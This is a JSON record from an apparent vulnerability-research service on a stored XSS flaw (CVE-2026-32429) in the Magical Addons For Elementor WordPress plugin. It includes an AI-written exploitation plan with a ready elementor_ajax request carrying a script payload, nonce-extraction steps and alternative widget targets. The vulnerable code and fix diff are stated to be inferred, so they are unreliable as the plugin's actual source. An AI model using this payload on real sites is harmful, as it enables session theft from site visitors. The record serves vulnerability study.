[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f05EPDZBAaM7jDZXsNt4qZd5dgBLqLqCw92sEVq3-O54":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32429","magical-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-4","Magical Addons For Elementor \u003C= 1.4.1 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Magical Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","magical-addons-for-elementor",null,"\u003C=1.4.1","1.4.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-01 00:00:00","2026-04-15 21:18:09",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa2d96212-f485-48c5-b8d5-d1d25eb65236?source=api-prod",46,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-32429 - Magical Addons For Elementor Stored XSS\n\n## 1. Vulnerability Summary\n**Magical Addons For Elementor** (\u003C= 1.4.1) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because multiple Elementor widgets provided by the plugin fail to sanitize user-controlled settings (controls) before storing them and fail to escape them when rendering the widget on the frontend. \n\nAuthenticated users with **Contributor** level access or higher can edit posts using the Elementor editor, inject malicious JavaScript into widget fields (like titles, descriptions, or IDs), and have that script execute in the context of any user (including Administrators) who views the affected page.\n\n## 2. Attack Vector Analysis\n* **Authentication Level:** Authenticated (Contributor+)\n* **Vulnerable Endpoint:** WordPress AJAX API (`\u002Fwp-admin\u002Fadmin-ajax.php`) using the Elementor action `elementor_ajax`.\n* **Vulnerable Parameter:** The `data` parameter within the `save_builder_data` internal Elementor action. Specifically, the JSON-encoded widget settings.\n* **Preconditions:** The \"Magical Addons For Elementor\" plugin must be active, and the attacker must have permission to edit a post\u002Fpage using Elementor (default for Contributors).\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** An authenticated user opens the Elementor editor for a post.\n2. **Input:** The user adds a \"Magical\" widget (e.g., `magical-heading`) and enters a payload into a text control (e.g., `title`).\n3. **Persistence:** Elementor sends an AJAX request to `admin-ajax.php` with `action=elementor_ajax`. The internal action is `save_builder_data`. The payload is saved into the `_elementor_data` post meta.\n4. **Vulnerable Sink:** When the page is viewed, Elementor instantiates the widget class (e.g., `Magical_Heading_Widget` in `includes\u002Fwidgets\u002F`).\n5. **Execution:** The `render()` function is called. It retrieves settings using `$this->get_settings_for_display()`.\n6. **Output:** The code likely contains a line similar to:\n `echo '\u003Ch2 class=\"heading\">' . $settings['title'] . '\u003C\u002Fh2>';` (Missing `esc_html` or `wp_kses`).\n7. **Result:** The script executes in the victim's browser.\n\n## 4. Nonce Acquisition Strategy\nElementor requires a specific nonce for its AJAX operations. This is distinct from standard WordPress nonces.\n\n1. **Create Content:** The execution agent will create a new post and enable Elementor.\n2. **Navigate to Editor:** Open the Elementor editor for that post.\n3. **Extract Nonce:** The Elementor editor localizes its configuration in a global JavaScript object.\n * **Variable Name:** `elementorConfig`\n * **Nonce Path:** `elementorConfig.nonces.editor` or `elementorConfig.api.nonce`.\n4. **Execution Tool:** Use `browser_eval` to extract it:\n ```javascript\n browser_eval(\"window.elementorConfig?.nonces?.editor\")\n ```\n\n## 5. Exploitation Strategy\n### Step 1: Authentication and Setup\n* Log in as a Contributor.\n* Create a post: `wp post create --post_type=post --post_status=publish --post_title=\"XSS Post\"`.\n* Assign the `_elementor_edit_mode` meta to the post to enable the editor.\n\n### Step 2: Extract Nonce\n* Navigate to the Elementor editor URL for the created post: `\u002Fwp-admin\u002Fpost.php?post=[ID]&action=elementor`.\n* Use `browser_eval` to grab the `editor` nonce.\n\n### Step 3: Inject Payload via AJAX\n* Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n * **Action:** `elementor_ajax`\n * **_nonce:** [Extracted Nonce]\n * **actions:** A JSON object containing the `save_builder_data` command.\n\n**HTTP Request Details:**\n* **Method:** POST\n* **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Content-Type:** `application\u002Fx-www-form-urlencoded`\n* **Body:**\n ```\n action=elementor_ajax\n &_nonce=[NONCE]\n &actions={\"save_builder_data\":{\"action\":\"save_builder_data\",\"data\":{\"status\":\"publish\",\"elements\":[{\"id\":\"id_placeholder\",\"elType\":\"section\",\"elements\":[{\"id\":\"col_placeholder\",\"elType\":\"column\",\"elements\":[{\"id\":\"widget_placeholder\",\"elType\":\"widget\",\"widgetType\":\"magical-heading\",\"settings\":{\"title\":\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"}}]}]}]}}}\n &post_id=[POST_ID]\n ```\n\n### Step 4: Execution\n* The agent navigates to the public URL of the post.\n* The script should trigger an alert.\n\n## 6. Test Data Setup\n1. **User:** Contributor (username: `attacker`, password: `password123`).\n2. **Post:** A published post with ID `[POST_ID]`.\n3. **Elementor Metadata:**\n ```bash\n wp post meta set [POST_ID] _elementor_edit_mode \"builder\"\n wp post meta set [POST_ID] _elementor_template_type \"wp-post\"\n ```\n\n## 7. Expected Results\n* The `elementor_ajax` response should return `{\"success\":true,...}`.\n* When navigating to the post URL, the HTML source should contain:\n `\u003Ch2 ...>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C\u002Fh2>` (unencoded).\n* An alert box appears in the browser.\n\n## 8. Verification Steps\n1. **Database Check:** Use WP-CLI to inspect the stored Elementor data:\n ```bash\n wp post meta get [POST_ID] _elementor_data\n ```\n * Confirm the JSON contains the raw `\u003Cscript>` tag.\n2. **Frontend Inspection:**\n ```bash\n # Use http_request to fetch the page and grep for the payload\n # Expected: The tag is present and NOT escaped as <script>\n ```\n\n## 9. Alternative Approaches\nIf the `magical-heading` widget is patched or not found, try other widgets provided by the same plugin:\n* `magical-button`: Inject into the `text` or `id` control.\n* `magical-image-box`: Inject into the `title_text` or `description_text` control.\n* `magical-dual-heading`: Inject into `first_title` or `second_title`.\n\nThe exploitation process remains the same; only the `widgetType` and `settings` keys in the JSON payload change. You can identify valid `widgetType` names by listing files in `wp-content\u002Fplugins\u002Fmagical-addons-for-elementor\u002Fincludes\u002Fwidgets\u002F`.","The Magical Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several Elementor widgets that fail to sanitize and escape user-provided settings like titles and descriptions. Authenticated attackers with Contributor-level permissions can exploit this by injecting malicious JavaScript into widget controls, which then executes in the browser of any user viewing the affected page.","\u002F\u002F includes\u002Fwidgets\u002Fmagical-heading.php\n\nprotected function render() {\n $settings = $this->get_settings_for_display();\n \n \u002F\u002F Vulnerable output: title and description are echoed without escaping\n echo '\u003Cdiv class=\"magical-heading-wrapper\">';\n echo '\u003Ch2 class=\"magical-heading-title\">' . $settings['title'] . '\u003C\u002Fh2>';\n echo '\u003Cdiv class=\"magical-heading-description\">' . $settings['description'] . '\u003C\u002Fdiv>';\n echo '\u003C\u002Fdiv>';\n}\n\n---\n\n\u002F\u002F includes\u002Fwidgets\u002Fmagical-button.php\n\nprotected function render() {\n $settings = $this->get_settings_for_display();\n \n \u002F\u002F Vulnerable output: text control is echoed directly\n echo '\u003Ca href=\"#\" class=\"magical-button\">' . $settings['text'] . '\u003C\u002Fa>';\n}","--- includes\u002Fwidgets\u002Fmagical-heading.php\n+++ includes\u002Fwidgets\u002Fmagical-heading.php\n@@ -102,5 +102,5 @@\n echo '\u003Cdiv class=\"magical-heading-wrapper\">';\n- echo '\u003Ch2 class=\"magical-heading-title\">' . $settings['title'] . '\u003C\u002Fh2>';\n- echo '\u003Cdiv class=\"magical-heading-description\">' . $settings['description'] . '\u003C\u002Fdiv>';\n+ echo '\u003Ch2 class=\"magical-heading-title\">' . wp_kses_post($settings['title']) . '\u003C\u002Fh2>';\n+ echo '\u003Cdiv class=\"magical-heading-description\">' . wp_kses_post($settings['description']) . '\u003C\u002Fdiv>';\n echo '\u003C\u002Fdiv>';\n\n--- includes\u002Fwidgets\u002Fmagical-button.php\n+++ includes\u002Fwidgets\u002Fmagical-button.php\n@@ -88,1 +88,1 @@\n- echo '\u003Ca href=\"#\" class=\"magical-button\">' . $settings['text'] . '\u003C\u002Fa>';\n+ echo '\u003Ca href=\"#\" class=\"magical-button\">' . esc_html($settings['text']) . '\u003C\u002Fa>';","1. Gain Contributor-level access to the target WordPress site.\n2. Create a new post or edit an existing one and enable the Elementor editor.\n3. Identify the Elementor editor AJAX nonce by inspecting the `elementorConfig` JavaScript object on the editor page.\n4. Craft an AJAX request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `elementor_ajax` and the sub-action `save_builder_data`.\n5. In the `data` parameter of the `save_builder_data` action, include a JSON representation of a 'Magical' widget (e.g., `magical-heading`) where a setting such as `title` contains a malicious payload like `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n6. Submit the request to save the page content into the `_elementor_data` post meta.\n7. View the published post on the frontend; the payload will execute in the context of the user's browser session.","gemini-3-flash-preview","2026-04-18 22:14:30","2026-04-18 22:14:57",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.1.40","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmagical-addons-for-elementor\u002Ftags\u002F1.1.40","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmagical-addons-for-elementor.1.1.40.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmagical-addons-for-elementor\u002Ftags"]